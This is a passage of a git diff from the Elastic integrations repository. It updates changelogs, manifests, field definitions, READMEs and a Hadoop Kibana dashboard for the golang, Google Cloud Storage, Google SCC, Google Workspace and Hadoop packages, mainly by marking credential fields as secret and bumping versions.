type: enhancement + link: https://github.com/elastic/integrations/pull/9321 +- version: "1.3.1" + changes: + - description: Disable secrets for older stack versions due to errors. + type: bugfix + link: https://github.com/elastic/integrations/pull/9279 +- version: "1.3.0" + changes: + - description: Enable 'secret' for the sensitive fields, supported from 8.12. + type: enhancement + link: https://github.com/elastic/integrations/pull/9009 - version: "1.2.0" changes: - description: Limit request tracer log count to five. diff --git a/packages/golang/docs/README.md b/packages/golang/docs/README.md index 63d828e7192..9093936778c 100644 --- a/packages/golang/docs/README.md +++ b/packages/golang/docs/README.md @@ -37,97 +37,7 @@ For step-by-step instructions on how to set up an integration, see the [Getting ### Troubleshooting -If host.ip is shown conflicted under ``logs-*`` data view, then this issue can be solved by reindexing the ``Heap`` and ``Expvar`` data stream's indices. -To reindex the data, the following steps must be performed. - -1. Stop the data stream by going to `Integrations -> Golang -> Integration policies` open the configuration of Golang and disable the `Collect Golang metrics` toggle to reindex metrics data stream and save the integration. - -2. Copy data into the temporary index and delete the existing data stream and index template by performing the following steps in the Dev tools. - -``` -POST _reindex -{ - "source": { - "index": "" - }, - "dest": { - "index": "temp_index" - } -} -``` -Example: -``` -POST _reindex -{ - "source": { - "index": "logs-golang.heap-default" - }, - "dest": { - "index": "temp_index" - } -} -``` - -``` -DELETE /_data_stream/ -``` -Example: -``` -DELETE /_data_stream/logs-golang.heap-default -``` - -``` -DELETE _index_template/ -``` -Example: -``` -DELETE _index_template/logs-golang.heap -``` -3. Go to `Integrations -> Golang -> Settings` and click on `Reinstall Golang`. - -4. Copy data from temporary index to new index by performing the following steps in the Dev tools. - -``` -POST _reindex -{ - "conflicts": "proceed", - "source": { - "index": "temp_index" - }, - "dest": { - "index": "", - "op_type": "create" - - } -} -``` -Example: -``` -POST _reindex -{ - "conflicts": "proceed", - "source": { - "index": "temp_index" - }, - "dest": { - "index": "logs-golang.heap-default", - "op_type": "create" - - } -} -``` - -5. Verify data is reindexed completely. - -6. Start the data stream by going to the `Integrations -> Golang -> Integration policies` and open configuration of integration and enable the `Collect Golang metrics` toggle and save the integration. - -7. Delete temporary index by performing the following step in the Dev tools. - -``` -DELETE temp_index -``` - -More details about reindexing can be found [here](https://www.elastic.co/guide/en/elasticsearch/reference/current/docs-reindex.html). +- If `host.ip` appears conflicted under the ``logs-*`` data view, this issue can be resolved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/use-a-data-stream.html#reindex-with-a-data-stream) the ``Heap`` and ``Expvar`` data streams. ## Metrics reference diff --git a/packages/golang/manifest.yml b/packages/golang/manifest.yml index dd721f5283e..467bd5f7590 100644 --- a/packages/golang/manifest.yml +++ b/packages/golang/manifest.yml @@ -1,14 +1,14 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: golang title: Golang -version: "1.2.0" +version: "1.4.1" description: This Elastic integration collects metrics from Golang applications. type: integration categories: - observability conditions: kibana: - version: ^8.7.1 + version: ^8.12.0 elastic: subscription: basic screenshots: @@ -64,6 +64,7 @@ policy_templates: - name: password type: password title: Password + secret: true show_user: false required: false description: Enter password of Golang application. diff --git a/packages/google_cloud_storage/changelog.yml b/packages/google_cloud_storage/changelog.yml index 3d759cbf9fc..5e9240bad15 100644 --- a/packages/google_cloud_storage/changelog.yml +++ b/packages/google_cloud_storage/changelog.yml @@ -1,3 +1,8 @@ +- version: "1.1.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9127 - version: "1.0.1" changes: - description: Changed owners diff --git a/packages/google_cloud_storage/manifest.yml b/packages/google_cloud_storage/manifest.yml index 1185d34bfcf..b28b876ef26 100644 --- a/packages/google_cloud_storage/manifest.yml +++ b/packages/google_cloud_storage/manifest.yml @@ -1,12 +1,12 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: google_cloud_storage title: Custom GCS (Google Cloud Storage) Input description: Collect JSON data from configured GCS Bucket with Elastic Agent. type: integration -version: 1.0.1 +version: 1.1.0 conditions: kibana: - version: "^8.11.0" + version: "^8.12.0" categories: - custom - cloud @@ -37,6 +37,7 @@ policy_templates: multi: false required: false show_user: true + secret: true - name: service_account_file type: text title: Service Account File diff --git a/packages/google_scc/changelog.yml b/packages/google_scc/changelog.yml index 78d62e79186..f1cf90a7bd7 100644 --- a/packages/google_scc/changelog.yml +++ b/packages/google_scc/changelog.yml @@ -1,4 +1,19 @@ # newer versions go on top +- version: "1.2.0" + changes: + - description: Update manifest format version to v3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9392 +- version: "1.1.1" + changes: + - description: Add cloudsecurity_cdr sub category label + type: enhancement + link: https://github.com/elastic/integrations/pull/9213 +- version: "1.1.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9127 - version: "1.0.1" changes: - description: Changed owners diff --git a/packages/google_scc/data_stream/asset/_dev/test/pipeline/test-asset.log-expected.json b/packages/google_scc/data_stream/asset/_dev/test/pipeline/test-asset.log-expected.json index dd336ab0a34..3012324f884 100644 --- a/packages/google_scc/data_stream/asset/_dev/test/pipeline/test-asset.log-expected.json +++ b/packages/google_scc/data_stream/asset/_dev/test/pipeline/test-asset.log-expected.json @@ -505,7 +505,7 @@ "identity_type": "ANY_IDENTITY" }, "egress_to": { - "externalResources": [ + "external_resources": [ "string" ], "operations": [ @@ -583,7 +583,7 @@ "identity_type": "ANY_IDENTITY" }, "egress_to": { - "externalResources": [ + "external_resources": [ "string" ], "operations": [ diff --git a/packages/google_scc/data_stream/asset/elasticsearch/ingest_pipeline/pipeline_asset.yml b/packages/google_scc/data_stream/asset/elasticsearch/ingest_pipeline/pipeline_asset.yml index bcddbc0c678..d8d7b800648 100644 --- a/packages/google_scc/data_stream/asset/elasticsearch/ingest_pipeline/pipeline_asset.yml +++ b/packages/google_scc/data_stream/asset/elasticsearch/ingest_pipeline/pipeline_asset.yml @@ -630,6 +630,7 @@ processors: "operations": "operations" "methodSelectors": "method_selectors" "serviceName": "service_name" + "externalResources": "external_resources" tag: painless_to_rename_fields_under_servicePerimeter_status_egressPolicies_object source: | def renameKeys(Map json, Map keyMap) { @@ -688,6 +689,7 @@ processors: "operations": "operations" "methodSelectors": "method_selectors" "serviceName": "service_name" + "externalResources": "external_resources" tag: painless_to_rename_fields_under_servicePerimeter_spec_egressPolicies_object source: | def renameKeys(Map json, Map keyMap) { diff --git a/packages/google_scc/data_stream/asset/fields/fields.yml b/packages/google_scc/data_stream/asset/fields/fields.yml index c8714d9dca1..54f07819cd7 100644 --- a/packages/google_scc/data_stream/asset/fields/fields.yml +++ b/packages/google_scc/data_stream/asset/fields/fields.yml @@ -58,6 +58,9 @@ - name: required_access_levels type: keyword description: 'A list of other access levels defined in the same Policy, referenced by resource name. Referencing an AccessLevel which does not exist is an error. All access levels listed must be granted for the Condition to be true. Example: "accessPolicies/MY_POLICY/accessLevels/LEVEL_NAME".' + - name: sub_networks + type: keyword + description: CIDR block IP subnetwork specification. May be IPv4 or IPv6. Note that for a CIDR IP address block, the specified IP address portion must be properly truncated (i.e. all the host bits must be zero) or the input is considered malformed. For example, "192.0.2.0/24" is accepted but "192.0.2.1/24" is not. Similarly, for IPv6, "2001:db8::/32" is accepted whereas "2001:db8::1/32" is not. The originating IP of a request must be in one of the listed subnets in order for this Condition to be true. If empty, all IP addresses are allowed. - name: custom type: group fields: diff --git a/packages/google_scc/docs/README.md b/packages/google_scc/docs/README.md index 0657e99d658..44d9b3b8c08 100644 --- a/packages/google_scc/docs/README.md +++ b/packages/google_scc/docs/README.md @@ -248,6 +248,7 @@ An example event for `asset` looks as following: | google_scc.asset.access_level.basic.conditions.negate | Whether to negate the Condition. If true, the Condition becomes a NAND over its non-empty fields, each field must be false for the Condition overall to be satisfied. Defaults to false. | boolean | | google_scc.asset.access_level.basic.conditions.regions | The request must originate from one of the provided countries/regions. Must be valid ISO 3166-1 alpha-2 codes. | keyword | | google_scc.asset.access_level.basic.conditions.required_access_levels | A list of other access levels defined in the same Policy, referenced by resource name. Referencing an AccessLevel which does not exist is an error. All access levels listed must be granted for the Condition to be true. Example: "accessPolicies/MY_POLICY/accessLevels/LEVEL_NAME". | keyword | +| google_scc.asset.access_level.basic.conditions.sub_networks | CIDR block IP subnetwork specification. May be IPv4 or IPv6. Note that for a CIDR IP address block, the specified IP address portion must be properly truncated (i.e. all the host bits must be zero) or the input is considered malformed. For example, "192.0.2.0/24" is accepted but "192.0.2.1/24" is not. Similarly, for IPv6, "2001:db8::/32" is accepted whereas "2001:db8::1/32" is not. The originating IP of a request must be in one of the listed subnets in order for this Condition to be true. If empty, all IP addresses are allowed. | keyword | | google_scc.asset.access_level.custom.expression.description | Optional. Description of the expression. This is a longer text which describes the expression, e.g. when hovered over it in a UI. | keyword | | google_scc.asset.access_level.custom.expression.location | Optional. String indicating the location of the expression for error reporting, e.g. a file name and a position in the file. | keyword | | google_scc.asset.access_level.custom.expression.text | Textual representation of an expression in Common Expression Language syntax. | keyword | diff --git a/packages/google_scc/manifest.yml b/packages/google_scc/manifest.yml index 8d0073053df..ed94f36ccb1 100644 --- a/packages/google_scc/manifest.yml +++ b/packages/google_scc/manifest.yml @@ -1,15 +1,16 @@ -format_version: "3.0.0" +format_version: "3.0.3" name: google_scc title: Google Security Command Center -version: "1.0.1" +version: "1.2.0" description: Collect logs from Google Security Command Center with Elastic Agent. type: integration categories: - google_cloud - security + - cloudsecurity_cdr conditions: kibana: - version: ^8.8.0 + version: ^8.12.0 elastic: subscription: basic screenshots: @@ -66,6 +67,7 @@ policy_templates: required: false show_user: true description: "Path to a JSON or JSON blob file containing the credentials and key used to subscribe. Note: This is required field if not installed in GCP-Cloud Environment." + secret: true - name: parent_type type: select title: Parent Type @@ -152,6 +154,7 @@ policy_templates: required: true show_user: true description: Path to a JSON or JSON blob file containing the credentials and key used to subscribe. + secret: true - name: project_id type: text title: Project ID diff --git a/packages/google_workspace/changelog.yml b/packages/google_workspace/changelog.yml index adb4771e757..010fd45cdc2 100644 --- a/packages/google_workspace/changelog.yml +++ b/packages/google_workspace/changelog.yml @@ -1,4 +1,14 @@ # newer versions go on top +- version: "2.21.0" + changes: + - description: Update manifest format version to v3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9527 +- version: "2.20.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9127 - version: "2.19.2" changes: - description: Changed owners diff --git a/packages/google_workspace/data_stream/alert/fields/fields.yml b/packages/google_workspace/data_stream/alert/fields/fields.yml index bc9dfadfd94..70b012cef47 100644 --- a/packages/google_workspace/data_stream/alert/fields/fields.yml +++ b/packages/google_workspace/data_stream/alert/fields/fields.yml @@ -220,6 +220,8 @@ - name: recipient type: keyword description: The recipient of this email. + - name: recipient_email + type: keyword - name: subject_text type: keyword description: The email subject text (only available for reported emails). @@ -373,6 +375,9 @@ - name: info type: nested description: Metadata related to the triggered actions. + fields: + - name: object + type: keyword - name: types type: keyword description: Actions applied as a consequence of the rule being triggered. diff --git a/packages/google_workspace/docs/README.md b/packages/google_workspace/docs/README.md index 05685553e3a..11d81229b57 100644 --- a/packages/google_workspace/docs/README.md +++ b/packages/google_workspace/docs/README.md @@ -1550,6 +1550,7 @@ An example event for `alert` looks as following: | google_workspace.alert.data.messages.md5.hash.subject | The MD5 Hash of email's subject (only available for reported emails). | keyword | | google_workspace.alert.data.messages.message_body_snippet | The snippet of the message body text (only available for reported emails). | keyword | | google_workspace.alert.data.messages.recipient | The recipient of this email. | keyword | +| google_workspace.alert.data.messages.recipient_email | | keyword | | google_workspace.alert.data.messages.subject_text | The email subject text (only available for reported emails). | keyword | | google_workspace.alert.data.name | Rule name. | keyword | | google_workspace.alert.data.next_update_time | Timestamp by which the next update is expected to arrive. | date | @@ -1574,7 +1575,7 @@ An example event for `alert` looks as following: | google_workspace.alert.data.rule.violation_info.suppressed.action.types | Actions suppressed due to other actions with higher priority. | keyword | | google_workspace.alert.data.rule.violation_info.trigger.user.email | Email of the user who caused the violation. Value could be empty if not applicable, for example, a violation found by drive continuous scan. | keyword | | google_workspace.alert.data.rule.violation_info.trigger.value | Trigger of the rule. | keyword | -| google_workspace.alert.data.rule.violation_info.triggered.action.info | Metadata related to the triggered actions. | nested | +| google_workspace.alert.data.rule.violation_info.triggered.action.info.object | | keyword | | google_workspace.alert.data.rule.violation_info.triggered.action.types | Actions applied as a consequence of the rule being triggered. | keyword | | google_workspace.alert.data.rule_description | Description of the rule. | text | | google_workspace.alert.data.source.ip | The source IP address of the malicious email. | ip | diff --git a/packages/google_workspace/manifest.yml b/packages/google_workspace/manifest.yml index c6596a7ecc5..21c722550c7 100644 --- a/packages/google_workspace/manifest.yml +++ b/packages/google_workspace/manifest.yml @@ -1,17 +1,17 @@ name: google_workspace title: Google Workspace -version: "2.19.2" +version: "2.21.0" source: license: Elastic-2.0 description: Collect logs from Google Workspace with Elastic Agent. type: integration -format_version: "3.0.0" +format_version: "3.0.3" categories: - security - productivity_security conditions: kibana: - version: ^8.7.1 + version: ^8.12.0 elastic: subscription: basic screenshots: @@ -72,7 +72,7 @@ policy_templates: show_user: false description: The request tracer logs requests and responses to the agent's local file-system for debugging configurations. Enabling this request tracing compromises security and should only be used for debugging. See [documentation](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-input-httpjson.html#_request_tracer_filename) for details. - name: jwt_json - type: text + type: password title: Jwt JSON description: | Raw contents of the JWT file. Useful when hosting a file along with the agent is not possible. @@ -80,6 +80,7 @@ policy_templates: multi: false required: false show_user: true + secret: true - name: delegated_account type: text title: Delegated Account diff --git a/packages/hadoop/_dev/build/docs/README.md b/packages/hadoop/_dev/build/docs/README.md index da33b0b5023..0b0cafc92aa 100644 --- a/packages/hadoop/_dev/build/docs/README.md +++ b/packages/hadoop/_dev/build/docs/README.md @@ -17,7 +17,7 @@ This integration has been tested against Hadoop version `3.3.6`. ### Troubleshooting If host.ip is shown conflicted under ``logs-*`` data view, then this issue can be solved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/use-a-data-stream.html#reindex-with-a-data-stream) the ``Application`` data stream's indices. -If host.ip is shown conflicted under ``metrics-*`` data view, then this issue can be solved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/use-a-data-stream.html#reindex-with-a-data-stream) the ``Cluster``, ``Datanode``, ``Namenode`` and ``Node Manager`` data stream's indices. +If host.ip is shown conflicted under ``metrics-*`` data view, then this issue can be solved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/tsds-reindex.html) the ``Cluster``, ``Datanode``, ``Namenode`` and ``Node Manager`` data stream's indices. ## application diff --git a/packages/hadoop/changelog.yml b/packages/hadoop/changelog.yml index 6b97ab99584..ad2f90ed3cb 100644 --- a/packages/hadoop/changelog.yml +++ b/packages/hadoop/changelog.yml @@ -1,4 +1,14 @@ # newer versions go on top +- version: "1.5.2" + changes: + - description: Inline "by reference" visualizations + type: enhancement + link: https://github.com/elastic/integrations/pull/8423 +- version: "1.5.1" + changes: + - description: Update the link to the correct reindexing procedure. + type: bugfix + link: https://github.com/elastic/integrations/pull/9021 - version: "1.5.0" changes: - description: Limit request tracer log count to five. diff --git a/packages/hadoop/docs/README.md b/packages/hadoop/docs/README.md index a54cc4ebed1..bce0513c7d9 100644 --- a/packages/hadoop/docs/README.md +++ b/packages/hadoop/docs/README.md @@ -17,7 +17,7 @@ This integration has been tested against Hadoop version `3.3.6`. ### Troubleshooting If host.ip is shown conflicted under ``logs-*`` data view, then this issue can be solved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/use-a-data-stream.html#reindex-with-a-data-stream) the ``Application`` data stream's indices. -If host.ip is shown conflicted under ``metrics-*`` data view, then this issue can be solved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/use-a-data-stream.html#reindex-with-a-data-stream) the ``Cluster``, ``Datanode``, ``Namenode`` and ``Node Manager`` data stream's indices. +If host.ip is shown conflicted under ``metrics-*`` data view, then this issue can be solved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/tsds-reindex.html) the ``Cluster``, ``Datanode``, ``Namenode`` and ``Node Manager`` data stream's indices. ## application diff --git a/packages/hadoop/kibana/dashboard/hadoop-3e16f2c0-cd28-11ec-be30-1d9331f0b107.json b/packages/hadoop/kibana/dashboard/hadoop-3e16f2c0-cd28-11ec-be30-1d9331f0b107.json index 6939076d93d..13abf7bc94c 100644 --- a/packages/hadoop/kibana/dashboard/hadoop-3e16f2c0-cd28-11ec-be30-1d9331f0b107.json +++ b/packages/hadoop/kibana/dashboard/hadoop-3e16f2c0-cd28-11ec-be30-1d9331f0b107.json @@ -1,652 +1,660 @@ { - "attributes": { - "controlGroupInput": { - "chainingSystem": "HIERARCHICAL", - "controlStyle": "oneLine", - "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", - "panelsJSON": "{\"6df7972b-25f0-453b-829b-c183cddbc2f8\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"hadoop.application.id\",\"title\":\"Applications\",\"id\":\"6df7972b-25f0-453b-829b-c183cddbc2f8\",\"enhancements\":{}}}}" - }, - "description": "", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "optionsJSON": { - "hidePanelTitles": false, - "syncColors": false, - "syncCursor": true, - "syncTooltips": false, - "useMargins": true - }, - "panelsJSON": [ - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "logs-*", - "name": "indexpattern-datasource-layer-dcf6a578-de72-4570-9fd8-f157f6494eb8", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "formBased": { - "layers": { - "dcf6a578-de72-4570-9fd8-f157f6494eb8": { - "columnOrder": [ - "bf367b81-240d-468f-bd19-7b42516a2d6f", - "75832028-a5ee-46c0-b95b-32f5a04b39c4" - ], - "columns": { - "75832028-a5ee-46c0-b95b-32f5a04b39c4": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Elapsed Time (ms)", - "operationType": "max", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "hadoop.application.time.elapsed" - }, - "bf367b81-240d-468f-bd19-7b42516a2d6f": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Application Id", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "75832028-a5ee-46c0-b95b-32f5a04b39c4", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 5 - }, - "scale": "ordinal", - "sourceField": "hadoop.application.id" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "gridlinesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "75832028-a5ee-46c0-b95b-32f5a04b39c4" - ], - "layerId": "dcf6a578-de72-4570-9fd8-f157f6494eb8", - "layerType": "data", - "position": "top", - "seriesType": "bar_stacked", - "showGridlines": false, - "xAccessor": "bf367b81-240d-468f-bd19-7b42516a2d6f", - "yConfig": [ - { - "axisMode": "left", - "forAccessor": "75832028-a5ee-46c0-b95b-32f5a04b39c4" - } - ] - } - ], - "legend": { - "isVisible": true, - "position": "top", - "showSingleSeries": true - }, - "preferredSeriesType": "bar_stacked", - "title": "Empty XY chart", - "valueLabels": "hide" - } + "id": "hadoop-3e16f2c0-cd28-11ec-be30-1d9331f0b107", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.7.0" + }, + "coreMigrationVersion": "8.8.0", + "typeMigrationVersion": "8.7.0", + "updated_at": "2023-11-07T17:16:59.199Z", + "created_at": "2023-11-07T17:16:59.199Z", + "version": "Wzk5LDFd", + "attributes": { + "controlGroupInput": { + "chainingSystem": "HIERARCHICAL", + "controlStyle": "oneLine", + "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", + "panelsJSON": "{\"6df7972b-25f0-453b-829b-c183cddbc2f8\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"hadoop.application.id\",\"title\":\"Applications\",\"id\":\"6df7972b-25f0-453b-829b-c183cddbc2f8\",\"enhancements\":{}}}}" + }, + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "syncCursor": true, + "syncTooltips": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-dcf6a578-de72-4570-9fd8-f157f6494eb8", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "dcf6a578-de72-4570-9fd8-f157f6494eb8": { + "columnOrder": [ + "bf367b81-240d-468f-bd19-7b42516a2d6f", + "75832028-a5ee-46c0-b95b-32f5a04b39c4" + ], + "columns": { + "75832028-a5ee-46c0-b95b-32f5a04b39c4": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Elapsed Time (ms)", + "operationType": "max", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "hadoop.application.time.elapsed" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 24, - "i": "21b49c8e-4de0-4e5f-bd72-89f3dc794af1", - "w": 18, - "x": 0, - "y": 0 - }, - "panelIndex": "21b49c8e-4de0-4e5f-bd72-89f3dc794af1", - "title": "Elapsed time of different applications [Metrics Hadoop]", - "type": "lens", - "version": "8.10.2" - }, - { - "embeddableConfig": { - "attributes": { - "description": "", - "references": [ - { - "id": "logs-*", - "name": "indexpattern-datasource-layer-358c9e71-f4a3-4980-adec-21e72950e734", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "358c9e71-f4a3-4980-adec-21e72950e734": { - "columnOrder": [ - "d03524e9-64ac-4ac9-87e9-680f408594b7" - ], - "columns": { - "d03524e9-64ac-4ac9-87e9-680f408594b7": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Average Elapsed Time", - "operationType": "average", - "params": { - "emptyAsNull": true, - "format": { - "id": "duration", - "params": { - "decimals": 0, - "fromUnit": "milliseconds" - } - } - }, - "scale": "ratio", - "sourceField": "hadoop.application.time.elapsed" - } - }, - "incompleteColumns": {} - } - } - } + "bf367b81-240d-468f-bd19-7b42516a2d6f": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Application Id", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "75832028-a5ee-46c0-b95b-32f5a04b39c4", + "type": "column" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "visualization": { - "accessor": "d03524e9-64ac-4ac9-87e9-680f408594b7", - "layerId": "358c9e71-f4a3-4980-adec-21e72950e734", - "layerType": "data", - "size": "m", - "textAlign": "center", - "titlePosition": "bottom" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsLegacyMetric" - }, - "enhancements": {}, - "hidePanelTitles": true + "size": 5 + }, + "scale": "ordinal", + "sourceField": "hadoop.application.id" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "gridlinesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true }, - "gridData": { - "h": 8, - "i": "9fed89bd-d709-4c4a-a84a-93b4d805940a", - "w": 8, - "x": 18, - "y": 0 + "layers": [ + { + "accessors": [ + "75832028-a5ee-46c0-b95b-32f5a04b39c4" + ], + "layerId": "dcf6a578-de72-4570-9fd8-f157f6494eb8", + "layerType": "data", + "position": "top", + "seriesType": "bar_stacked", + "showGridlines": false, + "xAccessor": "bf367b81-240d-468f-bd19-7b42516a2d6f", + "yConfig": [ + { + "axisMode": "left", + "forAccessor": "75832028-a5ee-46c0-b95b-32f5a04b39c4" + } + ] + } + ], + "legend": { + "isVisible": true, + "position": "top", + "showSingleSeries": true }, - "panelIndex": "9fed89bd-d709-4c4a-a84a-93b4d805940a", - "title": "Average elapsed time [Metrics Hadoop]", - "type": "lens", - "version": "8.10.2" + "preferredSeriesType": "bar_stacked", + "title": "Empty XY chart", + "valueLabels": "hide" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "logs-*", - "name": "indexpattern-datasource-layer-c0d13a02-cbb4-496c-88bd-6187253ec8d8", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "formBased": { - "layers": { - "c0d13a02-cbb4-496c-88bd-6187253ec8d8": { - "columnOrder": [ - "71dbc991-2911-4abe-b977-4dda3d9d5bb0", - "b1201382-d991-47f1-9466-b0a4231edf29" - ], - "columns": { - "71dbc991-2911-4abe-b977-4dda3d9d5bb0": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Application Id", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "b1201382-d991-47f1-9466-b0a4231edf29", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 5 - }, - "scale": "ordinal", - "sourceField": "hadoop.application.id" - }, - "b1201382-d991-47f1-9466-b0a4231edf29": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Number of Virtual Cores", - "operationType": "max", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "hadoop.application.vcore_seconds" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "gridlinesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "b1201382-d991-47f1-9466-b0a4231edf29" - ], - "layerId": "c0d13a02-cbb4-496c-88bd-6187253ec8d8", - "layerType": "data", - "position": "top", - "seriesType": "bar_horizontal", - "showGridlines": false, - "xAccessor": "71dbc991-2911-4abe-b977-4dda3d9d5bb0", - "yConfig": [ - { - "axisMode": "left", - "forAccessor": "b1201382-d991-47f1-9466-b0a4231edf29" - } - ] - } - ], - "legend": { - "isVisible": true, - "position": "top", - "showSingleSeries": true - }, - "preferredSeriesType": "bar_horizontal", - "title": "Empty XY chart", - "valueLabels": "hide" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 24, + "i": "21b49c8e-4de0-4e5f-bd72-89f3dc794af1", + "w": 18, + "x": 0, + "y": 0 + }, + "panelIndex": "21b49c8e-4de0-4e5f-bd72-89f3dc794af1", + "title": "Elapsed time of different applications [Metrics Hadoop]", + "type": "lens", + "version": "8.10.2" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-358c9e71-f4a3-4980-adec-21e72950e734", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "358c9e71-f4a3-4980-adec-21e72950e734": { + "columnOrder": [ + "d03524e9-64ac-4ac9-87e9-680f408594b7" + ], + "columns": { + "d03524e9-64ac-4ac9-87e9-680f408594b7": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Average Elapsed Time", + "operationType": "average", + "params": { + "emptyAsNull": true, + "format": { + "id": "duration", + "params": { + "decimals": 0, + "fromUnit": "milliseconds" + } } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 12, - "i": "8b49723a-7ec3-4b6a-8b5f-879f2dd4f5b0", - "w": 22, - "x": 26, - "y": 0 - }, - "panelIndex": "8b49723a-7ec3-4b6a-8b5f-879f2dd4f5b0", - "title": "Number of Virtual Cores Allocated [Metrics Hadoop]", - "type": "lens", - "version": "8.10.2" + }, + "scale": "ratio", + "sourceField": "hadoop.application.time.elapsed" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "d03524e9-64ac-4ac9-87e9-680f408594b7", + "layerId": "358c9e71-f4a3-4980-adec-21e72950e734", + "layerType": "data", + "size": "m", + "textAlign": "center", + "titlePosition": "bottom" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "logs-*", - "name": "indexpattern-datasource-layer-3003026c-64e9-4a34-9256-5500fb1a618a", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "formBased": { - "layers": { - "3003026c-64e9-4a34-9256-5500fb1a618a": { - "columnOrder": [ - "a72c3684-ca50-4a1e-bae7-328ae098c42d" - ], - "columns": { - "a72c3684-ca50-4a1e-bae7-328ae098c42d": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Max Virtual Cores Allocated", - "operationType": "max", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "hadoop.application.allocated.v_cores" - } - }, - "incompleteColumns": {} - } - } - } + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + 